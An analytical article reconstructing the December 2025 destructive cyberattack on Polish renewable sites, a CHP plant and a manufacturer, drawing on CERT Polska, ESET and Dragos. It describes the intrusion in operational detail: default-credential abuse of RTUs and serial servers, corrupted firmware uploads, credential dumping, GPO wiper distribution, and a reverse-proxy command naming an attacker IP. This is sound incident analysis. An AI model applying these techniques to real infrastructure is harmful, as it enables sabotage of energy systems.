On 29 December 2025, Poland was hit by a coordinated destructive cyber campaign that targeted more than thirty wind and photovoltaic sites, a major combined heat and power plant, and a manufacturing company. The primary public account, published by CERT Polska, shows that the operation crossed from enterprise compromise into direct OT sabotage, damaging RTUs, protection relays, HMIs, and serial device servers while also attempting domain wide data destruction in corporate environments. In the renewable segment, the attack did not interrupt ongoing electricity generation, but it severed communication with distribution system operators and removed remote supervisory control, demonstrating that strategic impact on energy systems can be achieved without causing an immediate blackout. This article reconstructs the incident in detail from the CERT Polska report and integrates the supplementary malware analysis published by ESET together with the OT focused interpretation offered by Dragos. Its central argument is that the importance of the Polish case lies not in spectacular technical novelty, but in the effectiveness of a campaign built on exposed remote access, weak identity governance, default credentials, insecure management surfaces, and poor architectural separation. The incident should therefore be read as a major warning for European energy operators: in distributed generation environments, cyber weakness at the edge can accumulate across many small sites until it becomes operationally and strategically significant.
Introduction
CERT Polska opens the report1 by stating that on 29 December 2025, during the morning and afternoon hours, coordinated attacks occurred in Poland’s cyberspace against numerous wind and solar farms, a private manufacturing company, and a CHP plant supplying heat to nearly half a million customers. The attacks are described as purely destructive in nature and comparable to deliberate acts of arson. CERT Polska also stresses that both information systems and physical industrial equipment were affected, which it characterizes as uncommon in public reporting to date. The events took place during low temperatures and snowstorms shortly before New Year’s Eve, which amplifies their strategic meaning even though mass service disruption did not materialize.
What makes the case analytically important is not that it caused a national blackout. It did not. The importance lies elsewhere. The campaign demonstrated that a threat actor could simultaneously target dozens of grid edge and industrial environments, achieve operationally significant effects, and do so mainly by exploiting weaknesses in architecture, identity, and equipment hardening. That raises the threshold question of what modern energy sabotage really requires. The Polish case suggests that for many distributed energy environments, the answer is not highly specialized malware but a strong understanding of how remote access, telecontrol, and operational support are actually implemented in the field.
The primary facts established by CERT Polska
The report establishes several facts with high confidence. First, the incidents across the renewable facilities, the CHP plant, and the manufacturing company were coordinated and attributed by CERT Polska to the same threat actor. Second, at least thirty wind and solar farms were affected. Third, the CHP plant was significant enough to supply heat to nearly half a million customers. Fourth, the campaign was destructive rather than financially motivated. Fifth, the renewable attacks caused loss of communication with DSOs and loss of remote control, but did not stop electricity generation or destabilize the Polish power system.
That last point deserves emphasis. In the renewable sector, the attack did not primarily target the physical process of generation itself. Instead, it targeted the control and communication layer at the grid connection point. This distinction matters because it explains how a cyberattack can be strategically meaningful without causing immediate nationwide supply failure. A distributed generation fleet can continue to produce electricity while simultaneously becoming harder to monitor, harder to command, and slower to restore when supervisory and telecontrol devices have been damaged.
Architecture of the attacked renewable sites
CERT Polska explains the renewable architecture in order to make the attack intelligible. Electricity from wind turbines and photovoltaic systems is collected and routed to a power substation called the grid connection point. There, voltage is stepped up to 110 kV for transfer to the distribution grid. The DSO oversees the conditions at the grid connection point (GCP) and uses the GCP for remote monitoring and supervisory control. These substations are usually unmanned and remotely managed, which means remote access and telecontrol are structurally central to operations.
The report identifies the key industrial components present at the GCP. These include the remote terminal unit for telecontrol and supervision, a local HMI, protection relays, serial device servers for IP to serial connectivity, primary and backup communications including a cellular router, and an integrated VPN concentrator and firewall. Poland’s DSOs typically require communication between the operator’s SCADA system and the GCP to pass through serial links using DNP3.0 or IEC 101. That choice helps reduce the chance that a compromised GCP could directly pivot into the DSO network, but it does not prevent sabotage of the GCP itself.
This architectural description is more than background. It reveals the attacker’s logic. The GCP is both a physical interconnection point and a digital supervision point. Damaging the devices there degrades remote control, remote visibility, and restoration readiness, even if turbines and PV strings continue to operate. The campaign therefore targeted the operational nervous system of the site rather than the generation assets directly.
Initial access at the renewable sites
In each affected renewable facility, a FortiGate appliance served as both VPN concentrator and firewall. CERT Polska states that the VPN interface was exposed to the internet and that authentication to configured accounts did not require multifactor authentication. The report also notes that reusing the same accounts and passwords across multiple facilities is common in the industry. This matters because once a threat actor compromises one valid account, scaling to other sites using the same identity becomes easier and cheaper.
CERT Polska adds that many of the analyzed facilities did use segregated VLAN subnets, but that the attacker had administrative privileges on the FortiGate. That administrative position likely allowed the attacker either to obtain credentials for a VPN account with access to all subnets or simply to modify the device configuration to achieve equivalent access. All analyzed FortiGate devices were factory reset on the day of the attack, apparently both to hinder restoration and to erase traces. The perimeter device was therefore not just a gateway. It became the attacker’s identity broker, policy override point, and evidence destruction point.
Automated destruction inside the renewable substations
On 29 December 2025, destructive actions were initiated against the devices reached inside the substations. CERT Polska reports that the activity appears to have been at least partially automated. Devices were damaged in ascending IP order, and when the attack failed at a given IP address within a network segment, it did not continue against subsequent addresses. This detail suggests procedural automation rather than fully manual device by device compromise. It also suggests the adversary had enough knowledge of site patterns to encode attack logic around address layout.
The report is explicit that damage to RTU controllers caused the loss of communication between the facility and the DSO and prevented remote control, but did not affect ongoing generation. That statement captures the essence of the renewable attack. The attacker succeeded against telecontrol and supervision, not against the physical conversion of energy itself.
Hitachi RTUs
Most of the affected farms used Hitachi RTU560 controllers, running firmware versions 12.6.6.0, 12.7.3.0, 13.1.1.0, and 13.5.2.0. These devices were configured with default credentials, including an account named Default, and exposed a web interface reachable from the GCP network and, with sufficient privileges, from the FortiGate. The attacker used that default account to log into the web interface and upload corrupted firmware. The firmware, in ELF format, had 240 bytes of 0xFF inserted at the program entry point, causing invalid instruction execution and a reboot loop. The modified firmware identified itself as version 13.5.3.0, which was not present in the affected environments, implying that the attacker likely sourced it externally.
CERT Polska further notes that a secure update feature with digital signature verification had been introduced in version 13.2.1 but required explicit activation, and none of the supporting devices had it enabled. Even then, the report notes that CVE 2024 2617 could bypass secure update until fixed in version 13.7.7. Hitachi Energy PSIRT independently confirmed the scenario. This combination of default credentials, reachable management surfaces, weak firmware integrity enforcement, and known update path weakness is one of the clearest examples in the report of how OT sabotage can be achieved without needing ICS protocol malware.
Mikronika RTUs, Relion relays, HMIs, and Moxa serial servers
At facilities using Mikronika RTUs, the attacker logged in via SSH using default root credentials and executed a destructive command intended to delete all files from the Linux based system. Mikronika later recovered logs showing network scanning and login attempts on 25 December 2025 at all facilities where the device was deployed. Hitachi Relion 650 v1.1 protection devices were attacked in two cases via default FTP access, which allowed the deletion of critical files and led to shutdown and prevented restart. CERT Polska notes that if the devices had been deployed per the manufacturer’s recommendations, the default FTP account would have been automatically disabled.
Some facilities used Mikronika Syndis software on Windows 10 HMIs. These systems had a default local administrator password. The attacker accessed them through RDP, enabled administrative shares, created a firewall rule called Microsoft Update that opened TCP 445, and used PowerShell to make the system accessible over SMB for remote command execution. Reconnaissance followed with Impacket, and on the morning of 29 December a malicious file was written to C:\Source.exe and executed. CERT Polska states that this was the same malware later analyzed as DynoWiper in the CHP case. On HMIs where the local administrator account had different credentials, only unsuccessful password breaking attempts were observed and the HMI was not damaged.
Every affected facility also used Moxa NPort 6xxx serial device servers. These exposed a web interface and were configured with default login credentials. The attacker used those credentials to reset devices to factory settings, change passwords, and set unreachable IP addresses such as 127.0.0.1. The result was not only unavailability but intentional delay in restoration. That detail is significant because it shows that the attacker optimized not just for immediate denial of service but for recovery friction.
The CHP plant attack
The attack on one of Poland’s CHP plants had a different tempo and a broader enterprise dimension. CERT Polska states that the attack’s objective was the irreversible destruction of data stored on devices within the internal network through execution of a wiper. The destructive phase was preceded by a long term infiltration, theft of sensitive information, compromise of privileged Active Directory accounts, and unrestricted lateral movement. The wiper was distributed through Group Policy Objects, but an EDR solution detected and blocked the malicious activity. CERT Polska notes that suspicious activity had been visible for months before the attempted wiper deployment.
Between March and July 2025, the attacker conducted reconnaissance, unauthorized data access, and credential theft. CERT Polska traces early activity to RDP logons from an address assigned to a FortiGate interface on a jump host, then onward movement to other systems including the domain controller. The attacker captured screenshots with nircmd, executed commands via PsExec, and generated outlog.txt files that included process lists, network connections, routing tables, ARP cache entries, and user directory contents. The report also notes that many of the systems accessed via SMB had scada in their names, implying a specific focus on industrial automation assets.
Privilege escalation followed. CERT Polska describes a Base64 encoded ZIP archive being decoded with certutil, after which EDR detected a likely LSASS memory theft attempt. The attacker also used Rubeus to create a Diamond Ticket and later dumped the Active Directory database from ntds.dit after creating shadow copies. These are classic Windows domain compromise techniques, but here they are embedded in a campaign that also had an OT reconnaissance dimension.
Late 2025 activity in the CHP environment
When activity resumed in late 2025, the attacker repeatedly connected to the FortiGate SSL VPN portal using multiple accounts defined in configuration, again without two factor authentication. CERT Polska says the attacker used Tor nodes as well as Polish and foreign IP addresses associated with compromised infrastructure. After authenticating, the attacker used FortiGate bookmark functionality to RDP into jump hosts. Some bookmark definitions contained statically configured target credentials, so the attacker could use the SSL VPN portal to reach internal systems without supplying extra local or domain credentials. That is a severe design failure because it turns the perimeter device into a credential relay into the internal network.
The attacker also used a reverse SOCKS proxy, rsocx, under filenames such as r.exe and rsocx.exe, with the command r.exe -r 31.172.71[.]5:8008. Reconnaissance included built in tools such as nslookup and ping, as well as Advanced Port Scanner and Advanced IP Scanner. Microsoft Edge in private mode was used to access internal services and third party resources, including Dropbox and Pastebin. These details matter because they show a patient operator using both living off the land techniques and public tooling rather than relying exclusively on bespoke implants.
CERT Polska also documents theft of LSASS memory dumps, copies of the SAM and SYSTEM hives, theft of ntds.dit, exfiltration attempts via PowerShell to 31.172.71[.]5:50443, and theft of FortiGate configuration files. The attacker modified the FortiGate perimeter configuration by adding a rule that allowed any protocol and any IP to a specified device while disabling traffic logging and making the rule name resemble an existing institutional label in the configuration. This is a particularly clear example of how the attack combined access, persistence, stealth reduction of auditability, and destructive preparation.
Wiper deployment and attempted server destruction at the CHP
On the morning of 29 December, the attacker accessed the SSL VPN portal, RDPed to a jump host, then reached a domain controller where an archive containing the wiper was created. The malware was placed on a network share and deployed through an additional GPO. CERT Polska reports that the file itself was not detected by antivirus, but its execution was blocked at runtime by the EDR solution through a canary mechanism. That prevented data overwriting on more than 100 machines where the executable had already been launched. A second, slightly modified attempt later the same day also failed.
The attacker also tried to destroy data directly on server disks. CERT Polska describes the use of Tiny Core Linux booted on a server via the KVM interface, followed by dd to overwrite portions of attached disks with random data. The attacker also attempted to modify RAID configuration through Intel Rapid Storage Technology. This part of the report is especially revealing because it shows the operator shifting from filesystem destruction to direct storage layer sabotage when needed.
The manufacturing company
CERT Polska reports that the attacker also attempted to disrupt a manufacturing company on 29 December 2025 in coordination with the energy attacks, though the target was opportunistic rather than linked to the other organizations. Initial access came through a Fortinet perimeter device whose past vulnerability and configuration theft had already led to public disclosure in a criminal forum. After gaining access, the attacker modified FortiGate configuration for persistence through built in scripting, creating weekly scripts to exfiltrate privileged credentials and modify security settings. Those scripts sent results to an attacker controlled Slack channel using FortiGate’s own notification capability.
To move internally, the attacker again used an SSL VPN tunnel and Impacket. Administrative access to a domain controller enabled deployment of a PowerShell based wiper through a GPO pulling the file from a network share. CERT Polska calls this malware LazyWiper. The report also states that the attacker later used on premises credentials to access Microsoft 365 services such as Exchange, Teams, and SharePoint and was particularly interested in files and emails related to OT modernization, SCADA systems, and technical work. That behavior indicates intelligence collection alongside destructive operations.
DynoWiper
CERT Polska identified four closely related DynoWiper samples. Two are version A, represented by Source.exe and dynacom_update.exe, and two are version B samples compiled under the name schtask.exe. According to the report, version A includes three phases: initialization, data corruption, file deletion, and then system shutdown. Version B removes the shutdown phase and inserts a five second sleep between corruption and deletion. The malware uses the Mersenne Twister random number generator, recursively scans removable and fixed drives, excludes a set of directories such as system32, windows, program files, temp, and appdata, corrupts files by overwriting selected offsets with pseudorandom 16 byte sequences, then deletes files. It contains no persistence, no command and control, no shell command invocations, and no specific attempt to conceal itself from antivirus.
ESET’s follow on analysis2 sharpens this picture. ESET states that DynoWiper was deployed to a shared domain path such as C:\inetpub\pub\ under names like schtask.exe, schtask2.exe, and a redacted update filename, and that the PDB path in some samples was C:\Users\vagrant\Documents\Visual Studio 2013\Projects\Source\Release\Source.pdb. ESET infers that the build environment may have involved Vagrant managed virtual machines and notes that operators likely modified and rebuilt the wiper after failed attempts during the same day. ESET also stresses that unlike Industroyer and Industroyer2, the observed DynoWiper samples targeted only the IT environment and contained no observed OT specific functionality.
ESET additionally identifies similarities between DynoWiper and the ZOV wiper, including directory exclusion logic and distinct handling for smaller versus larger files, and attributes DynoWiper to Sandworm with medium confidence. CERT Polska is more conservative. It states that DynoWiper has some similarities to Sandworm and SeashellBlizzard wiper type tools but that the similarity level is too low to attribute it to previously used wiper families. That difference is not a contradiction so much as a difference of analytic scope. ESET is focused on malware lineage and TTP overlap. CERT Polska is focused on incident level evidence and national attribution discipline.
LazyWiper
LazyWiper, used in the manufacturing sector company, is a PowerShell based wiper that overwrites files with pseudorandom 32 byte sequences at 16 byte intervals, corrupting roughly two thirds of each targeted file. CERT Polska lists a wide range of file extensions targeted, including archive formats, backups, certificates, Office documents, engineering files, SQL, images, PDFs, logs, and even .exe. The report notes that the C# function responsible for file overwriting differs stylistically from the rest of the script, contains implausible comments, and was likely generated by an LLM. It also contains a safeguard that terminates execution if it detects it is running on a domain controller.
This is a notable detail because it shows that destructive operations do not necessarily require polished, bespoke malware engineering. In this case, a crude PowerShell wiper with likely machine generated code was sufficient when paired with domain level access and GPO based distribution. The sophistication was in the access and the operating model, not necessarily in the code quality of the payload.
Wiper distribution
CERT Polska shows that in the renewable case DynoWiper was executed directly on the HMI. In the CHP and manufacturing cases, however, wipers were distributed through Active Directory using a PowerShell script executed on a domain controller. The script backed up the existing Default Domain Policy, modified it to create a new policy called Custom Domain Policy, created a scheduled task called Custom GPO Task running as NT AUTHORITY\SYSTEM, launched the malware from a network share, and then deleted the task. CERT Polska lists the SHA256 values for the distribution scripts and highlights distinctive markers such as the task filter GUID 79A87EBB-4DF6-4541-9530-CAD8BEE8A7AD.
This mechanism is important because it shows the relationship between enterprise compromise and destructive scale. Once a domain controller is controlled, wiper distribution can become a matter of policy manipulation rather than one host at a time execution. The operational burden of scale moves from the malware to the directory service.
Attribution
CERT Polska analyzed both infrastructure and malware. On the infrastructure side, it found use of compromised VPS servers and compromised Cisco routers, with additional related devices identified through commercial network flow monitoring. In consultation with threat intelligence companies, CERT Polska concluded that the reconstructed communications overlapped substantially with infrastructure publicly described by Cisco and the FBI and associated with the activity cluster known as Static Tundra, Berserk Bear, Ghost Blizzard, and Dragonfly. CERT Polska says this cluster has a documented interest in the energy sector and industrial devices and concludes that the infrastructure used for initial access, exfiltration, VPN tunneling for wiper deployment, and RAID sabotage overlaps with Static Tundra infrastructure.
At the same time, CERT Polska is careful about the malware evidence. It states that DynoWiper contains some similarities to Sandworm and SeashellBlizzard associated wipers, and that the PowerShell script used to run DynoWiper on workstations uses the same deployment technique as Sandworm linked tools like ArguePatch and RansomBoggs, but it does not conclude that Sandworm participated. LazyWiper is explicitly deemed unsuitable for attribution because it was likely largely generated by an LLM and lacks distinctive features.
ESET goes further on the malware side and attributes DynoWiper to Sandworm with medium confidence, citing close resemblance to TTPs seen earlier in 2025 in ZOV wiper incidents in Ukraine. ESET also notes Sandworm’s long history of attacking Polish organizations, including those in the energy sector, first covertly for espionage and later destructively, as in the Prestige incidents. ([welivesecurity.com][1])
Additional OT perspective from Dragos
The OT cybersecurity firm Dragos states that the 29 December 2025 event was a coordinated cyberattack against multiple sites connected to distributed energy generation in Poland and describes it as the first major coordinated attack on distributed energy resources at scale3. In Dragos’s framing, the affected systems were the communication and control assets that link grid operators to combined heat and power facilities and to wind and solar sites, rather than the transmission backbone itself. Dragos also states that adversaries gained access to operational technology systems critical to grid operations and disabled some equipment beyond repair at site level.
This OT specific framing is consistent with the CERT Polska report, which explains that the attack on renewable sites caused loss of communication between facilities and DSOs and prevented remote control, while not interrupting ongoing electricity generation or destabilizing the Polish power system. In other words, the attacker succeeded against the supervisory and telecontrol layer at the grid connection point without producing an immediate bulk power effect.
Dragos adds an important interpretive layer. It argues that the event is significant not because it caused outages, but because it demonstrated that distributed energy infrastructure is now a valid target for a sophisticated adversary. The brief stresses that DER environments are more numerous, depend heavily on remote connectivity, often receive less cybersecurity investment than centralized plants, and therefore present a broader and less manageable attack surface. It also notes that RTUs standardize how remote sites interface with control centers, which makes compromise repeatable across many sites if edge devices, vulnerabilities, or connectivity patterns are similar.
Dragos also clarifies an operational point that is easy to miss in superficial retellings of the incident. In electric systems, loss of communications does not usually cause immediate shutdown. A device that loses connectivity often continues operating locally, but it can no longer be monitored or controlled remotely. This is why the power stayed on even though key OT and communications equipment had been compromised. Dragos therefore treats the incident as a serious OT intrusion with limited immediate physical effect, not as a failed or trivial attack.
The brief further argues that the December 2025 operation represents both continuity and evolution relative to earlier ELECTRUM operations. Continuity lies in the use of destructive tooling, wipers, and attacks on communications infrastructure. Evolution lies in the shift from centralized control points, such as those targeted in Ukraine in 2015 and 2016, toward the distributed edge of the grid, meaning RTUs and communication systems spread across many smaller generation sites. Dragos assesses with moderate confidence that ELECTRUM was responsible, while also noting that the observed impact appears more opportunistic and less fully prepared than the earlier Ukraine operations.
This perspective sharpens the strategic meaning of the case. The Polish incident was not merely an enterprise compromise that happened to touch energy companies. It was an attack on the digital coordination fabric of distributed generation. The core lesson is that a modern grid does not need to lose its transmission backbone to suffer operationally relevant cyber sabotage. It is enough for an adversary to degrade visibility, telemetry, remote control, and restoration capability across enough distributed sites at the same time.
Why the case matters
The Polish incident matters because it compresses several assumptions about energy cybersecurity into a single, well documented case and shows that many of them are no longer defensible. It demonstrates that operationally significant disruption can be achieved without causing a national blackout, without deploying highly specialized ICS malware at every stage, and without compromising the transmission backbone. The attacker was able to produce meaningful effects by targeting the digital coordination layer of distributed generation: remote access paths, telecontrol devices, communications infrastructure, domain services, and management surfaces that were easier to reach than the physical process itself.
That is the first major lesson. In energy systems, the threshold for serious impact is lower than many discussions still imply. A plant or portfolio does not need to stop generating for the attack to matter. It is enough that operators lose visibility, lose remote control, and lose confidence in the integrity of the devices that connect generation assets to the wider grid. Once those functions are degraded across many sites at once, the attacker has already created an operational problem, a regulatory problem, and a strategic signal.
The second lesson concerns distributed energy itself. Wind, solar, and CHP assets connected through remote telemetry and supervisory infrastructure are often treated as too small, too fragmented, or too peripheral to be systemically attractive. The Polish case shows the opposite. Their very number, geographic spread, and dependence on remote access make them suitable targets for a coordinated campaign. What looks like decentralization from an electrical perspective can still be concentration from a cyber perspective if dozens of sites share the same perimeter technologies, the same access patterns, the same administrative shortcuts, and the same weakly governed OT components.
The third lesson is that the decisive weaknesses were largely architectural and operational, not exotic. Exposed VPNs, missing multifactor authentication, reused credentials, permissive firewall configurations, default accounts on OT devices, insecure management protocols, weak firmware integrity protections, and poor recovery design were enough to enable sabotage at scale. That matters because it means the case cannot be dismissed as the product of rare zero days or uniquely sophisticated tooling. The uncomfortable implication is that similar outcomes are plausible anywhere comparable patterns exist.
Finally, the incident matters because it marks a strategic shift in how energy disruption can be pursued. Previous landmark grid attacks were associated with centralized control points and more obvious attempts to produce immediate outage effects. Poland shows a different model: attack the distributed edge, degrade the communications and supervision fabric, damage what is reachable, and impose operational stress without necessarily crossing the threshold into catastrophic national disruption. That model is more scalable, more deniable, and in some contexts politically more usable.
What Poland exposed, then, was not just a successful campaign against a set of organizations. It exposed a structural reality of modern power systems: as generation becomes more distributed, cyber fragility can also become more distributed, and if that fragility is not governed deliberately, it can accumulate quietly across many small sites until it becomes strategically significant.
Conclusion
The December 2025 campaign against Poland’s energy sector was destructive, coordinated, and operationally significant. In the renewable segment, it disrupted telecontrol and visibility without stopping generation. In the CHP environment, it combined long term enterprise compromise with attempted mass wiper deployment and direct storage sabotage. In the manufacturing environment, it repeated the same broader logic of perimeter compromise, privileged access, cloud data theft, and destructive execution. Across all these targets, the shortest path to impact did not run through highly specialized ICS malware. It ran through weak remote access governance, permissive perimeter devices, poor credential hygiene, exposed management functions, and inadequate segregation between administrative reachability and operational consequence.
That is the most serious lesson of the case. The incident did not prove that modern adversaries need extraordinary tools to threaten energy systems. It proved something more uncomfortable: in many environments, they do not. If enough distributed sites share the same architectural weaknesses, the attacker does not need to break the grid at its center. It is sufficient to attack its coordination layer at the edge, site after site, until operators lose visibility, control, and confidence at the same time.
This is why the Polish case should not be read merely as an isolated national incident or as a near miss because the lights stayed on. It should be read as a warning about the cyber consequences of the energy transition when digital scale expands faster than security discipline. Distributed energy can increase resilience in physical and market terms, but if remote access, RTUs, gateways, HMIs, and support paths are deployed as low cost operational conveniences, that same distribution becomes a force multiplier for the attacker. What Poland revealed is not simply a successful intrusion. It is the emergence of a credible model for coordinated cyber sabotage against the digital fabric of distributed generation.
The final implication is strategic. The threshold for meaningful disruption in energy is lower than many operators, regulators, and vendors still assume. A grid does not need to collapse for an adversary to demonstrate coercive capability. It is enough to show that dozens of geographically separate assets can be reached, degraded, and partially blinded in a synchronized way. Once that has been demonstrated, the question is no longer whether distributed energy infrastructure is a valid target. The question is whether its owners are willing to govern it as critical infrastructure rather than as an accumulation of remotely managed field installations.
See also longforms
Quantum-Safe HTTPS Certificates: Google’s Structural Innovation, Technical Foundations, and Governance Implications
Measuring Cyber Risk in the Italian Corporate Sector
When Digital Trust Expires: Quantum Computing and the Collapse of Signature-Based Security
Zero Trust Network Access
See also posts
Quantum Cryptography at the Edge of Feasibility: Resource Estimates, Architectural Divergence, and Systemic Risk
Quantum Computing Threats and the Advantage of Acting Now
Quantum Key Distribution and Post-Quantum Cryptography
Cybersecurity in an Era with Quantum Computers: Interpreting Mosca’s Risk Inequality
Footnotes
See: CERT Polska report. CERT Polska is the first Polish computer emergency response team. It operates within NASK – National Research Institute, has been active since 1996, and carries out the role of CSIRT NASK, one of the three national level CSIRTs in Poland’s cybersecurity system. Its activities include incident handling, active response to threats, malware analysis, security research, threat information exchange, tool development, and public reporting on the security of Polish cyberspace.↩︎
See: DynoWiper update: Technical analysis and attribution.↩︎
See: ELECTRUM: Cyber Attack on Poland’s Electric System 2025.↩︎